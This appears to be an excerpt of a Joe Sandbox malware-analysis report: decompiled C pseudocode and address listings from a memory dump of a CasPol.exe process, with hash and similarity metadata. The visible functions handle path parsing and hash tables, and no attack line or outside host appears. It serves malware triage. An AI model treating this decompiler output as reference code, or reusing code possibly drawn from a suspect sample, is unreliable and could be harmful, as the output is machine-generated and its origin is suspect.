                                                                																		_t446 = _t425 & 0x0000ffff;
                                                                																		_v64 = _t446;
                                                                																		goto L58;
                                                                																	}
                                                                																	_t422 = _t422 - 1;
                                                                																	_v96 = _t422;
                                                                																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
                                                                																	if(_t360 == 0x20) {
                                                                																		goto L51;
                                                                																	}
                                                                																	if(_t360 == 0x2e) {
                                                                																		goto L51;
                                                                																	}
                                                                																	_t422 = _t422 + 1;
                                                                																	_v96 = _t422;
                                                                																	goto L56;
                                                                																} else {
                                                                																	L51:
                                                                																	 *(_t386 + _t422 * 2) = 0;
                                                                																	goto L52;
                                                                																}
                                                                																L69:
                                                                																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
                                                                																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
                                                                																}
                                                                																_t420 = _t420 + 1;
                                                                																_v100 = _t420;
                                                                																_t352 = _v56;
                                                                																goto L28;
                                                                															}
                                                                															_t446 = _t417 & 0x0000ffff;
                                                                															_v64 = _t446;
                                                                															_t439 = _v92;
                                                                															goto L58;
                                                                														}
                                                                														if(_v116 > 8) {
                                                                															goto L26;
                                                                														}
                                                                														_t446 = 0xa;
                                                                														_v64 = 0xa;
                                                                														_t439 = _v92;
                                                                														goto L58;
                                                                													}
                                                                													L72:
                                                                													if(_t415 > 0xffff) {
                                                                														_t446 = 0;
                                                                													}
                                                                													_v64 = _t446;
                                                                													_t439 = _v92;
                                                                													goto L58;
                                                                												}
                                                                												L26:
                                                                												_t352 = _v56;
                                                                												goto L27;
                                                                											}
                                                                										}
                                                                										_t379 = _t336[2] & 0x0000ffff;
                                                                										if(_t379 != 0x5c) {
                                                                											if(_t379 == 0x2f) {
                                                                												goto L22;
                                                                											}
                                                                											goto L98;
                                                                										}
                                                                										L22:
                                                                										_t337 = 2;
                                                                									}
                                                                									goto L23;
                                                                								}
                                                                								_t450 =  *_t336 & 0x0000ffff;
                                                                								if(_t450 == 0x5c || _t450 == 0x2f) {
                                                                									if(_t407 < 4) {
                                                                										L132:
                                                                										_t337 = 4;
                                                                										goto L23;
                                                                									}
                                                                									_t451 = _t336[1] & 0x0000ffff;
                                                                									if(_t451 != 0x5c) {
                                                                										if(_t451 == 0x2f) {
                                                                											goto L87;
                                                                										}
                                                                										goto L132;
                                                                									}
                                                                									L87:
                                                                									if(_t407 < 6) {
                                                                										L135:
                                                                										_t337 = 1;
                                                                										goto L23;
                                                                									}
                                                                									_t452 = _t336[2] & 0x0000ffff;
                                                                									if(_t452 != 0x2e) {
                                                                										if(_t452 == 0x3f) {
                                                                											goto L89;
                                                                										}
                                                                										goto L135;
                                                                									}
                                                                									L89:
                                                                									if(_t407 < 8) {
                                                                										L134:
                                                                										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                										goto L23;
                                                                									}
                                                                									_t384 = _t336[3] & 0x0000ffff;
                                                                									if(_t384 != 0x5c) {
                                                                										if(_t384 == 0x2f) {
                                                                											goto L91;
                                                                										}
                                                                										goto L134;
                                                                									}
                                                                									L91:
                                                                									_t337 = 6;
                                                                									goto L23;
                                                                								} else {
                                                                									goto L17;
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					goto L124;
                                                                				}
                                                                			}

































































































                                                                0x0168f814
                                                                0x0168f803
                                                                0x0168f803
                                                                0x0168f806
                                                                0x0168f806
                                                                0x00000000
                                                                0x00000000
                                                                0x0164719d
                                                                0x016471a2
                                                                0x016471a5
                                                                0x016471a9
                                                                0x016471ab
                                                                0x0168f826
                                                                0x0168f829
                                                                0x016471b1
                                                                0x016471b1
                                                                0x016471ba
                                                                0x016471ba
                                                                0x016471bf
                                                                0x016471c5
                                                                0x016471cf
                                                                0x016471d2
                                                                0x016471d8
                                                                0x016471dd
                                                                0x016471e4
                                                                0x016471e7
                                                                0x00000000
                                                                0x00000000
                                                                0x01647275
                                                                0x0164727a
                                                                0x0164727d
                                                                0x0164727f
                                                                0x01647282
                                                                0x01647284
                                                                0x0168f6a8
                                                                0x0168f6aa
                                                                0x0168f6aa
                                                                0x0164728a
                                                                0x0164728f
                                                                0x01647292
                                                                0x01647297
                                                                0x0164729a
                                                                0x0164729d
                                                                0x016472a0
                                                                0x016472a5
                                                                0x016472a9
                                                                0x016472ac
                                                                0x016472af
                                                                0x016472b2
                                                                0x016472b5
                                                                0x016472b7
                                                                0x016472ba
                                                                0x016472be
                                                                0x016472be
                                                                0x016472c2
                                                                0x016472c5
                                                                0x016472c8
                                                                0x0168f6b2
                                                                0x0168f6b2
                                                                0x00000000
                                                                0x00000000
                                                                0x01646fc5
                                                                0x01646fc5
                                                                0x01646fcc
                                                                0x01646fd8
                                                                0x01646fda
                                                                0x01646fdd
                                                                0x01646fe3
                                                                0x01647162
                                                                0x0168f845
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f84e
                                                                0x0168f8c4
                                                                0x0168f8c8
                                                                0x0168f8cb
                                                                0x0168f8ce
                                                                0x016470e0
                                                                0x016470e0
                                                                0x016470e3
                                                                0x016470e3
                                                                0x016470ea
                                                                0x016470ef
                                                                0x016470f1
                                                                0x016470f4
                                                                0x016470fc
                                                                0x016470fd
                                                                0x016470fe
                                                                0x0164710c
                                                                0x0164710c
                                                                0x0168f850
                                                                0x0168f858
                                                                0x0168f87a
                                                                0x0168f88a
                                                                0x0168f88d
                                                                0x0168f890
                                                                0x0168f893
                                                                0x0168f895
                                                                0x0168f898
                                                                0x0168f8a4
                                                                0x0168f8ad
                                                                0x0168f8b0
                                                                0x0168f8b3
                                                                0x0168f8b3
                                                                0x0168f8a4
                                                                0x01646fec
                                                                0x01646fec
                                                                0x01646fee
                                                                0x00000000
                                                                0x01646ff1
                                                                0x01646ff8
                                                                0x00000000
                                                                0x01646ffe
                                                                0x01647004
                                                                0x01647006
                                                                0x01647006
                                                                0x01647010
                                                                0x01647017
                                                                0x0164701e
                                                                0x01647072
                                                                0x01647074
                                                                0x0164707e
                                                                0x01647083
                                                                0x01647087
                                                                0x01647088
                                                                0x0164706c
                                                                0x0164706c
                                                                0x0164706d
                                                                0x00000000
                                                                0x0164706d
                                                                0x0164707c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164707c
                                                                0x01647020
                                                                0x01647023
                                                                0x016471ef
                                                                0x016471ef
                                                                0x016471f2
                                                                0x016471f7
                                                                0x00000000
                                                                0x00000000
                                                                0x016471fd
                                                                0x01647200
                                                                0x01647205
                                                                0x0164720b
                                                                0x0164720e
                                                                0x016472eb
                                                                0x00000000
                                                                0x00000000
                                                                0x016472f6
                                                                0x00000000
                                                                0x01647030
                                                                0x01647037
                                                                0x0164703e
                                                                0x01647055
                                                                0x0164705a
                                                                0x01647062
                                                                0x0168f908
                                                                0x0168f90e
                                                                0x0168f90f
                                                                0x0168f90f
                                                                0x0168f908
                                                                0x01647062
                                                                0x0164705a
                                                                0x00000000
                                                                0x01647045
                                                                0x01647045
                                                                0x01647049
                                                                0x0164704a
                                                                0x0164704d
                                                                0x0164704e
                                                                0x00000000
                                                                0x0164704e
                                                                0x0164703e
                                                                0x01647068
                                                                0x01647069
                                                                0x00000000
                                                                0x01647069
                                                                0x016472fc
                                                                0x01647301
                                                                0x01647304
                                                                0x01647314
                                                                0x01647314
                                                                0x01647319
                                                                0x00000000
                                                                0x00000000
                                                                0x01647325
                                                                0x0164732d
                                                                0x01647330
                                                                0x01647356
                                                                0x01647357
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01647332
                                                                0x01647332
                                                                0x01647337
                                                                0x00000000
                                                                0x00000000
                                                                0x01647343
                                                                0x0164734b
                                                                0x0164734e
                                                                0x01647361
                                                                0x00000000
                                                                0x00000000
                                                                0x01647367
                                                                0x01647367
                                                                0x01647368
                                                                0x00000000
                                                                0x01647368
                                                                0x01647350
                                                                0x01647351
                                                                0x01647351
                                                                0x00000000
                                                                0x01647332
                                                                0x0168f8f9
                                                                0x0168f8f9
                                                                0x0168f8fa
                                                                0x00000000
                                                                0x0168f8fa
                                                                0x01647306
                                                                0x0164730e
                                                                0x0168f8ee
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f8f4
                                                                0x00000000
                                                                0x0164730e
                                                                0x01647214
                                                                0x01647214
                                                                0x01647217
                                                                0x00000000
                                                                0x01647217
                                                                0x0164702c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164702c
                                                                0x0164708d
                                                                0x01647094
                                                                0x01647098
                                                                0x016470a0
                                                                0x0164738c
                                                                0x0164738d
                                                                0x0164738d
                                                                0x016470a0
                                                                0x01647098
                                                                0x016470a6
                                                                0x016470ab
                                                                0x016470b3
                                                                0x016470b5
                                                                0x016470cd
                                                                0x016470cd
                                                                0x016470d0
                                                                0x016470d8
                                                                0x0164711a
                                                                0x0164711c
                                                                0x0164711c
                                                                0x01647121
                                                                0x00000000
                                                                0x00000000
                                                                0x01647129
                                                                0x00000000
                                                                0x00000000
                                                                0x0164712b
                                                                0x0164712b
                                                                0x01647130
                                                                0x0164737e
                                                                0x01647381
                                                                0x00000000
                                                                0x01647381
                                                                0x01647138
                                                                0x00000000
                                                                0x00000000
                                                                0x01647144
                                                                0x01647144
                                                                0x016470da
                                                                0x016470da
                                                                0x016470dd
                                                                0x00000000
                                                                0x016470dd
                                                                0x016470b7
                                                                0x016470b8
                                                                0x016470bb
                                                                0x016470c2
                                                                0x00000000
                                                                0x00000000
                                                                0x016470c7
                                                                0x00000000
                                                                0x00000000
                                                                0x016470c9
                                                                0x016470ca
                                                                0x00000000
                                                                0x016470ad
                                                                0x016470ad
                                                                0x016470af
                                                                0x00000000
                                                                0x016470af
                                                                0x01647148
                                                                0x0164714d
                                                                0x0168f8e2
                                                                0x0168f8e2
                                                                0x01647153
                                                                0x01647154
                                                                0x01647157
                                                                0x00000000
                                                                0x01647157
                                                                0x0168f87c
                                                                0x0168f87f
                                                                0x0168f882
                                                                0x00000000
                                                                0x0168f882
                                                                0x0168f85e
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f864
                                                                0x0168f869
                                                                0x0168f86c
                                                                0x00000000
                                                                0x0168f86c
                                                                0x01647168
                                                                0x01647170
                                                                0x0168f8d6
                                                                0x0168f8d6
                                                                0x01647176
                                                                0x01647179
                                                                0x00000000
                                                                0x01647179
                                                                0x01646fe9
                                                                0x01646fe9
                                                                0x00000000
                                                                0x01646fe9
                                                                0x01646fbf
                                                                0x01646f8c
                                                                0x01646f93
                                                                0x016472d6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016472d6
                                                                0x01646f99
                                                                0x01646f99
                                                                0x01646f99
                                                                0x00000000
                                                                0x01646f68
                                                                0x01646f50
                                                                0x01646f56
                                                                0x0164722c
                                                                0x0168f629
                                                                0x0168f629
                                                                0x00000000
                                                                0x0168f629
                                                                0x01647232
                                                                0x01647239
                                                                0x0168f623
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f623
                                                                0x0164723f
                                                                0x01647242
                                                                0x0168f64e
                                                                0x0168f64e
                                                                0x00000000
                                                                0x0168f64e
                                                                0x01647248
                                                                0x0164724f
                                                                0x01647373
                                                                0x00000000
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e738671c5ef7fcd5ebd0a6b5867a2fcaf65d7fd1ffee8352ed83ac8e28927476
                                                                • Instruction ID: 6f4b6713f01dc51cdab426d032fdeb4a0e668bde5816e3de7e723df2c140fcd4
                                                                • Opcode Fuzzy Hash: e738671c5ef7fcd5ebd0a6b5867a2fcaf65d7fd1ffee8352ed83ac8e28927476
                                                                • Instruction Fuzzy Hash: FE029EB4D15215CBDB28DF9CC8806BDBBB2EF45700F65812EE916EB351E7709886CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E016FDFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed char _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				intOrPtr _v44;
                                                                				intOrPtr _v48;
                                                                				signed int _v52;
                                                                				signed int _v56;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				unsigned int _t173;
                                                                				signed int _t175;
                                                                				unsigned int _t177;
                                                                				intOrPtr _t178;
                                                                				signed int _t201;
                                                                				unsigned int _t223;
                                                                				unsigned int _t240;
                                                                				signed int _t258;
                                                                				intOrPtr _t269;
                                                                				signed int _t270;
                                                                				signed char _t271;
                                                                				signed char _t273;
                                                                				signed int _t274;
                                                                				intOrPtr* _t281;
                                                                				signed int* _t284;
                                                                				signed char _t292;
                                                                				signed int _t293;
                                                                				signed char _t300;
                                                                				signed char _t305;
                                                                				intOrPtr _t314;
                                                                				signed int _t315;
                                                                				signed int _t319;
                                                                				signed int _t323;
                                                                				intOrPtr _t326;
                                                                				signed char _t328;
                                                                				signed int _t334;
                                                                				signed char _t335;
                                                                				void* _t365;
                                                                				signed int _t368;
                                                                				signed int* _t373;
                                                                				signed int _t377;
                                                                				signed int _t378;
                                                                				signed int _t381;
                                                                				signed int _t382;
                                                                				signed int _t383;
                                                                				unsigned int _t384;
                                                                				void* _t385;
                                                                				void* _t386;
                                                                				void* _t387;
                                                                				void* _t388;
                                                                				void* _t389;
                                                                				void* _t390;
                                                                				signed int _t393;
                                                                				signed int _t406;
                                                                				signed int _t407;
                                                                
                                                                				_t367 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t407;
                                                                				_t269 = __ecx;
                                                                				_v44 = __ecx;
                                                                				if(__ecx == 0) {
                                                                					L80:
                                                                					_t270 = 0;
                                                                					L81:
                                                                					return E0166B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
                                                                				}
                                                                				_t383 = _a4;
                                                                				if(_t383 == 0 || __edx == 0) {
                                                                					goto L80;
                                                                				} else {
                                                                					_v56 = _t383;
                                                                					_t393 = 0x4cb2f;
                                                                					_t384 = _t383 << 2;
                                                                					_v52 = __edx;
                                                                					if(_t384 < 8) {
                                                                						L7:
                                                                						_t385 = _t384 - 1;
                                                                						if(_t385 == 0) {
                                                                							L20:
                                                                							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							L21:
                                                                							_t15 = _t269 + 0x18; // 0x1718680
                                                                							_v48 = _t15;
                                                                							L0164FAD0(_t15);
                                                                							_t17 = _t269 + 0xc; // 0x1718674
                                                                							_t367 = _t17;
                                                                							_t383 = 0;
                                                                							_v20 = _t367;
                                                                							_t271 = 0;
                                                                							while(1) {
                                                                								L22:
                                                                								_t19 = _t367 + 4; // 0x0
                                                                								_t173 =  *_t19;
                                                                								_v12 = _v12 | 0xffffffff;
                                                                								_v12 = _v12 << (_t173 & 0x0000001f);
                                                                								_t300 = _t392 & _v12;
                                                                								_v16 = _t300;
                                                                								_v16 = _v16 >> 0x18;
                                                                								_v28 = _t300;
                                                                								_v28 = _v28 >> 0x10;
                                                                								_v24 = _t300;
                                                                								_v24 = _v24 >> 8;
                                                                								_v32 = _t300;
                                                                								if(_t271 != 0) {
                                                                									goto L25;
                                                                								}
                                                                								_t240 = _t173 >> 5;
                                                                								_v36 = _t240;
                                                                								if(_t240 == 0) {
                                                                									_t270 = _t383;
                                                                									L34:
                                                                									if(_t270 == 0) {
                                                                										L38:
                                                                										_t272 = _v48;
                                                                										E0164FA00(_v48, _t300, _t383, _v48);
                                                                										_t367 =  &_v56;
                                                                										_t175 = E016FE62A(_v44,  &_v56, _t392);
                                                                										_v36 = _t175;
                                                                										if(_t175 != 0) {
                                                                											E01642280(_t175, _t272);
                                                                											_t273 = _t383;
                                                                											do {
                                                                												_t368 = _v20;
                                                                												_v12 = _v12 | 0xffffffff;
                                                                												_t177 =  *(_t368 + 4);
                                                                												_v12 = _v12 << (_t177 & 0x0000001f);
                                                                												_t305 = _v12 & _t392;
                                                                												_v24 = _t305;
                                                                												_v24 = _v24 >> 0x18;
                                                                												_v28 = _t305;
                                                                												_v28 = _v28 >> 0x10;
                                                                												_v16 = _t305;
                                                                												_v16 = _v16 >> 8;
                                                                												_v40 = _t305;
                                                                												if(_t273 != 0) {
                                                                													while(1) {
                                                                														L44:
                                                                														_t273 =  *_t273;
                                                                														if((_t273 & 0x00000001) != 0) {
                                                                															break;
                                                                														}
                                                                														if(_t305 == ( *(_t273 + 4) & _v12)) {
                                                                															L48:
                                                                															if(_t273 == 0) {
                                                                																L55:
                                                                																_t178 = _v44;
                                                                																_t274 =  *(_t368 + 4);
                                                                																_v16 =  *((intOrPtr*)(_t178 + 0x28));
                                                                																_v32 =  *(_t178 + 0x20);
                                                                																_t181 = _t274 >> 5;
                                                                																_v24 =  *((intOrPtr*)(_t178 + 0x24));
                                                                																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
                                                                																	L76:
                                                                																	_t383 = _v36;
                                                                																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
                                                                																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                                																	_t281 = _v20;
                                                                																	_t314 =  *((intOrPtr*)(_t281 + 8));
                                                                																	 *_t383 =  *(_t314 + _t367 * 4);
                                                                																	 *(_t314 + _t367 * 4) = _t383;
                                                                																	 *_t281 =  *_t281 + 1;
                                                                																	E0163FFB0(_t281, _t383, _v48);
                                                                																	goto L39;
                                                                																}
                                                                																_t315 = 2;
                                                                																if(E0165F3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
                                                                																	goto L76;
                                                                																}
                                                                																_t392 = _v40;
                                                                																if(_t392 < 4) {
                                                                																	_t392 = 4;
                                                                																}
                                                                																 *0x171b1e0(_t392 << 2, _v16);
                                                                																_t373 =  *_v32();
                                                                																_v12 = _t373;
                                                                																if(_t373 == 0) {
                                                                																	_t274 =  *(_v20 + 4);
                                                                																	if(_t274 >= 0x20) {
                                                                																		goto L76;
                                                                																	}
                                                                																	L78:
                                                                																	_t270 = _t383;
                                                                																	L79:
                                                                																	E0163FFB0(_t270, _t383, _v48);
                                                                																	_t367 = _v36;
                                                                																	E016FE5B6(_v44, _v36);
                                                                																	goto L81;
                                                                																} else {
                                                                																	_t107 = _t392 - 1; // 0x3
                                                                																	_t319 = _t107;
                                                                																	if((_t392 & _t319) == 0) {
                                                                																		L64:
                                                                																		if(_t392 > 0x4000000) {
                                                                																			_t392 = 0x4000000;
                                                                																		}
                                                                																		_t284 = _t373;
                                                                																		_t201 = _v20 | 0x00000001;
                                                                																		asm("sbb ecx, ecx");
                                                                																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
                                                                																		if(_t323 <= 0) {
                                                                																			L69:
                                                                																			_t377 = _v20;
                                                                																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
                                                                																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
                                                                																				L74:
                                                                																				_t326 =  *((intOrPtr*)(_t377 + 8));
                                                                																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
                                                                																				 *((intOrPtr*)(_t377 + 8)) = _v12;
                                                                																				 *(_t377 + 4) = _t274;
                                                                																				if(_t326 != 0) {
                                                                																					 *0x171b1e0(_t326, _v16);
                                                                																					 *_v24();
                                                                																					_t274 =  *(_v20 + 4);
                                                                																				}
                                                                																				goto L76;
                                                                																			} else {
                                                                																				goto L70;
                                                                																			}
                                                                																			do {
                                                                																				L70:
                                                                																				_t378 =  *((intOrPtr*)(_t377 + 8));
                                                                																				_v28 = _t378;
                                                                																				while(1) {
                                                                																					_t328 =  *(_t378 + _t383 * 4);
                                                                																					_v32 = _t328;
                                                                																					if((_t328 & 0x00000001) != 0) {
                                                                																						goto L73;
                                                                																					}
                                                                																					 *(_t378 + _t383 * 4) =  *_t328;
                                                                																					_t381 = _v12;
                                                                																					_t132 = _t392 - 1; // -1
                                                                																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                                																					_t292 = _v32;
                                                                																					 *_t292 =  *(_t381 + _t334 * 4);
                                                                																					 *(_t381 + _t334 * 4) = _t292;
                                                                																					_t378 = _v28;
                                                                																				}
                                                                																				L73:
                                                                																				_t377 = _v20;
                                                                																				_t383 = _t383 + 1;
                                                                																			} while (_t383 <  *(_t377 + 4) >> 5);
                                                                																			goto L74;
                                                                																		} else {
                                                                																			_t382 = _t383;
                                                                																			do {
                                                                																				_t382 = _t382 + 1;
                                                                																				 *_t284 = _t201;
                                                                																				_t284 =  &(_t284[1]);
                                                                																			} while (_t382 < _t323);
                                                                																			goto L69;
                                                                																		}
                                                                																	}
                                                                																	_t335 = _t319 | 0xffffffff;
                                                                																	if(_t392 == 0) {
                                                                																		L63:
                                                                																		_t392 = 1 << _t335;
                                                                																		goto L64;
                                                                																	} else {
                                                                																		goto L62;
                                                                																	}
                                                                																	do {
                                                                																		L62:
                                                                																		_t335 = _t335 + 1;
                                                                																		_t392 = _t392 >> 1;
                                                                																	} while (_t392 != 0);
                                                                																	goto L63;
                                                                																}
                                                                															}
                                                                															goto L49;
                                                                														}
                                                                													}
                                                                													_t273 = _t383;
                                                                													goto L48;
                                                                												}
                                                                												_t223 = _t177 >> 5;
                                                                												_v32 = _t223;
                                                                												if(_t223 == 0) {
                                                                													_t273 = _t383;
                                                                													L51:
                                                                													if(_t273 == 0) {
                                                                														goto L55;
                                                                													}
                                                                													_t88 = _t273 + 8; // 0x8
                                                                													if(E016FE7A8(_t88) != 0) {
                                                                														goto L79;
                                                                													}
                                                                													goto L78;
                                                                												}
                                                                												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                                                												_t305 = _v40;
                                                                												goto L44;
                                                                												L49:
                                                                											} while (E016FEE71(_t273,  &_v56) == 0);
                                                                											_t368 = _v20;
                                                                											goto L51;
                                                                										}
                                                                										L39:
                                                                										_t270 = _t383;
                                                                										goto L81;
                                                                									}
                                                                									_t50 = _t270 + 8; // 0x8
                                                                									_t345 = _t50;
                                                                									if(E016FE7A8(_t50) == 0) {
                                                                										_t270 = _t383;
                                                                									}
                                                                									E0164FA00(_t270, _t345, _t383, _v48);
                                                                									goto L81;
                                                                								}
                                                                								_t40 = _t367 + 8; // 0x0
                                                                								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                                                								_t300 = _v32;
                                                                								L25:
                                                                								_t367 = _v12;
                                                                								while(1) {
                                                                									_t271 =  *_t271;
                                                                									if((_t271 & 0x00000001) != 0) {
                                                                										break;
                                                                									}
                                                                									if(_t300 == ( *(_t271 + 4) & _t367)) {
                                                                										L30:
                                                                										if(_t270 == 0) {
                                                                											goto L38;
                                                                										}
                                                                										if(E016FEE71(_t270,  &_v56) != 0) {
                                                                											goto L34;
                                                                										}
                                                                										_t367 = _v20;
                                                                										goto L22;
                                                                									}
                                                                								}
                                                                								_t270 = _t383;
                                                                								goto L30;
                                                                							}
                                                                						}
                                                                						_t386 = _t385 - 1;
                                                                						if(_t386 == 0) {
                                                                							L19:
                                                                							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							_t367 = _t367 + 1;
                                                                							goto L20;
                                                                						}
                                                                						_t387 = _t386 - 1;
                                                                						if(_t387 == 0) {
                                                                							L18:
                                                                							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							_t367 = _t367 + 1;
                                                                							goto L19;
                                                                						}
                                                                						_t388 = _t387 - 1;
                                                                						if(_t388 == 0) {
                                                                							L17:
                                                                							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							_t367 = _t367 + 1;
                                                                							goto L18;
                                                                						}
                                                                						_t389 = _t388 - 1;
                                                                						if(_t389 == 0) {
                                                                							L16:
                                                                							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							_t367 = _t367 + 1;
                                                                							goto L17;
                                                                						}
                                                                						_t390 = _t389 - 1;
                                                                						if(_t390 == 0) {
                                                                							L15:
                                                                							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                							_t367 = _t367 + 1;
                                                                							goto L16;
                                                                						}
                                                                						if(_t390 != 1) {
                                                                							goto L21;
                                                                						}
                                                                						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
                                                                						_t367 = _t367 + 1;
                                                                						goto L15;
                                                                					}
                                                                					_t258 = _t384 >> 3;
                                                                					_v36 = _t258;
                                                                					_t293 = _t258;
                                                                					_t384 = _t384 + _t258 * 0xfffffff8;
                                                                					do {
                                                                						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
                                                                						_t406 =  *(_t367 + 7) & 0x000000ff;
                                                                						_t367 = _t367 + 8;
                                                                						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
                                                                						_t293 = _t293 - 1;
                                                                					} while (_t293 != 0);
                                                                					_t269 = _v44;
                                                                					goto L7;
                                                                				}
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b29cee2d2822ab3a78905d44582f76892212b92f5b1cd2a2a7ce1fce150456c7
                                                                • Instruction ID: c7560ddb2fe96ea32ac7dc43fec721d2a96387d7b1a9b9a25a4c0413393d0fd5
                                                                • Opcode Fuzzy Hash: b29cee2d2822ab3a78905d44582f76892212b92f5b1cd2a2a7ce1fce150456c7
                                                                • Instruction Fuzzy Hash: 57F1B372E002168BCB18CEA9CDD05BDFFF5EB49200B0A826DDA16EB395D735D941CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E01644120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                				signed int _v8;
                                                                				void* _v20;
                                                                				signed int _v24;
                                                                				char _v532;
                                                                				char _v540;
                                                                				signed short _v544;
                                                                				signed int _v548;
                                                                				signed short* _v552;
                                                                				signed short _v556;
                                                                				signed short* _v560;
                                                                				signed short* _v564;
                                                                				signed short* _v568;
                                                                				void* _v570;
                                                                				signed short* _v572;
                                                                				signed short _v576;
                                                                				signed int _v580;
                                                                				char _v581;
                                                                				void* _v584;
                                                                				unsigned int _v588;
                                                                				signed short* _v592;
                                                                				void* _v597;
                                                                				void* _v600;
                                                                				void* _v604;
                                                                				void* _v609;
                                                                				void* _v616;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				unsigned int _t161;
                                                                				signed int _t162;
                                                                				unsigned int _t163;
                                                                				void* _t169;
                                                                				signed short _t173;
                                                                				signed short _t177;
                                                                				signed short _t181;
                                                                				unsigned int _t182;
                                                                				signed int _t185;
                                                                				signed int _t213;
                                                                				signed int _t225;
                                                                				short _t233;
                                                                				signed char _t234;
                                                                				signed int _t242;
                                                                				signed int _t243;
                                                                				signed int _t244;
                                                                				signed int _t245;
                                                                				signed int _t250;
                                                                				void* _t251;
                                                                				signed short* _t254;
                                                                				void* _t255;
                                                                				signed int _t256;
                                                                				void* _t257;
                                                                				signed short* _t260;
                                                                				signed short _t265;
                                                                				signed short* _t269;
                                                                				signed short _t271;
                                                                				signed short** _t272;
                                                                				signed short* _t275;
                                                                				signed short _t282;
                                                                				signed short _t283;
                                                                				signed short _t290;
                                                                				signed short _t299;
                                                                				signed short _t307;
                                                                				signed int _t308;
                                                                				signed short _t311;
                                                                				signed short* _t315;
                                                                				signed short _t316;
                                                                				void* _t317;
